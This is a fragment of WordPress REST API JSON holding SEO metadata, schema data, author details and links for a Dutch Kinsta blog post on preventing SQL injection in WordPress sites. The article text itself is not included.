gebruikers\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kinsta.com\/nl\/#website\",\"url\":\"https:\/\/kinsta.com\/nl\/\",\"name\":\"Kinsta\u00ae\",\"description\":\"Snelle, veilige, premium hostingoplossingen\",\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/nl\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kinsta.com\/nl\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"nl-NL\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kinsta.com\/nl\/#organization\",\"name\":\"Kinsta\",\"url\":\"https:\/\/kinsta.com\/nl\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/kinsta.com\/nl\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2023\/12\/kinsta-logo.jpeg\",\"contentUrl\":\"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2023\/12\/kinsta-logo.jpeg\",\"width\":500,\"height\":500,\"caption\":\"Kinsta\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/nl\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Kinsta-Nederland-476213452787823\/\",\"https:\/\/x.com\/Kinsta_NL\",\"https:\/\/www.instagram.com\/kinstahosting\/\",\"https:\/\/www.linkedin.com\/company\/kinsta\/\",\"https:\/\/www.pinterest.com\/kinstahosting\/\",\"https:\/\/www.youtube.com\/c\/Kinsta\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kinsta.com\/nl\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\",\"name\":\"Shaumik Daityari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"nl-NL\",\"@id\":\"https:\/\/kinsta.com\/nl\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"caption\":\"Shaumik Daityari\"},\"description\":\"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!\",\"url\":\"https:\/\/kinsta.com\/nl\/blog\/author\/shaumikdaityari\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers","description":"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/","og_locale":"nl_NL","og_type":"article","og_title":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers","og_description":"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.","og_url":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/","og_site_name":"Kinsta\u00ae","article_publisher":"https:\/\/www.facebook.com\/Kinsta-Nederland-476213452787823\/","article_published_time":"2020-01-23T15:29:01+00:00","article_modified_time":"2023-10-12T14:26:07+00:00","og_image":[{"width":1460,"height":730,"url":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","type":"image\/jpeg"}],"author":"Shaumik Daityari","twitter_card":"summary_large_image","twitter_description":"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.","twitter_image":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","twitter_creator":"@Kinsta_NL","twitter_site":"@Kinsta_NL","twitter_misc":{"Geschreven door":"Shaumik Daityari","Geschatte leestijd":"12 minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#article","isPartOf":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/"},"author":{"name":"Shaumik Daityari","@id":"https:\/\/kinsta.com\/nl\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036"},"headline":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers","datePublished":"2020-01-23T15:29:01+00:00","dateModified":"2023-10-12T14:26:07+00:00","mainEntityOfPage":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/"},"wordCount":2604,"commentCount":0,"publisher":{"@id":"https:\/\/kinsta.com\/nl\/#organization"},"image":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","keywords":["sitesecurity","wordpresshack"],"articleSection":["WordPress beveiliging"],"inLanguage":"nl-NL","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/","url":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/","name":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers","isPartOf":{"@id":"https:\/\/kinsta.com\/nl\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage"},"image":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","datePublished":"2020-01-23T15:29:01+00:00","dateModified":"2023-10-12T14:26:07+00:00","description":"Leer wat een SQL injectie is, hoe je deze kwetsbaarheden rond SQL injecties kan voorkomen in je webapplicaties (zoals WordPress sites) en hoe je aanvallen kunt voorkomen.","breadcrumb":{"@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#breadcrumb"},"inLanguage":"nl-NL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/"]}]},{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#primaryimage","url":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","contentUrl":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2020\/01\/sql-injecties.jpg","width":1460,"height":730,"caption":"SQL-injecties"},{"@type":"BreadcrumbList","@id":"https:\/\/kinsta.com\/nl\/blog\/sql-injecties\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kinsta.com\/nl\/"},{"@type":"ListItem","position":2,"name":"WordPress ontwikkeling","item":"https:\/\/kinsta.com\/nl\/onderwerpen\/wordpress-ontwikkeling\/"},{"@type":"ListItem","position":3,"name":"SQL injectie: Een gedetailleerde handleiding voor WordPress gebruikers"}]},{"@type":"WebSite","@id":"https:\/\/kinsta.com\/nl\/#website","url":"https:\/\/kinsta.com\/nl\/","name":"Kinsta\u00ae","description":"Snelle, veilige, premium hostingoplossingen","publisher":{"@id":"https:\/\/kinsta.com\/nl\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kinsta.com\/nl\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"nl-NL"},{"@type":"Organization","@id":"https:\/\/kinsta.com\/nl\/#organization","name":"Kinsta","url":"https:\/\/kinsta.com\/nl\/","logo":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/kinsta.com\/nl\/#\/schema\/logo\/image\/","url":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2023\/12\/kinsta-logo.jpeg","contentUrl":"https:\/\/kinsta.com\/nl\/wp-content\/uploads\/sites\/7\/2023\/12\/kinsta-logo.jpeg","width":500,"height":500,"caption":"Kinsta"},"image":{"@id":"https:\/\/kinsta.com\/nl\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Kinsta-Nederland-476213452787823\/","https:\/\/x.com\/Kinsta_NL","https:\/\/www.instagram.com\/kinstahosting\/","https:\/\/www.linkedin.com\/company\/kinsta\/","https:\/\/www.pinterest.com\/kinstahosting\/","https:\/\/www.youtube.com\/c\/Kinsta"]},{"@type":"Person","@id":"https:\/\/kinsta.com\/nl\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036","name":"Shaumik Daityari","image":{"@type":"ImageObject","inLanguage":"nl-NL","@id":"https:\/\/kinsta.com\/nl\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","caption":"Shaumik Daityari"},"description":"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!","url":"https:\/\/kinsta.com\/nl\/blog\/author\/shaumikdaityari\/"}]}},"acf":[],"_links":{"self":[{"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/posts\/29380","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/comments?post=29380"}],"version-history":[{"count":7,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/posts\/29380\/revisions"}],"predecessor-version":[{"id":56033,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/posts\/29380\/revisions\/56033"}],"alternate":[{"embeddable":true,"hreflang":"en","title":"English","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/en"},{"embeddable":true,"hreflang":"fr","title":"French","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/fr"},{"embeddable":true,"hreflang":"es","title":"Spanish","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/es"},{"embeddable":true,"hreflang":"pt","title":"Portuguese","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/pt"},{"embeddable":true,"hreflang":"it","title":"Italian","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/it"},{"embeddable":true,"hreflang":"da","title":"Danish","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/dk"},{"embeddable":true,"hreflang":"nl","title":"Dutch","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/nl"},{"embeddable":true,"hreflang":"de","title":"German","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/de"},{"embeddable":true,"hreflang":"sv","title":"Swedish","href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/translations\/se"},{"href":"https:\/\/kinsta.com\/nl\/wp-json\/kinsta\/v1\/posts\/29380\/tree"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/media\/29383"}],"wp:attachment":[{"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/media?parent=29380"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/tags?post=29380"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/kinsta.com\/nl\/wp-json\/wp\/v2\/topic?post=29380"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}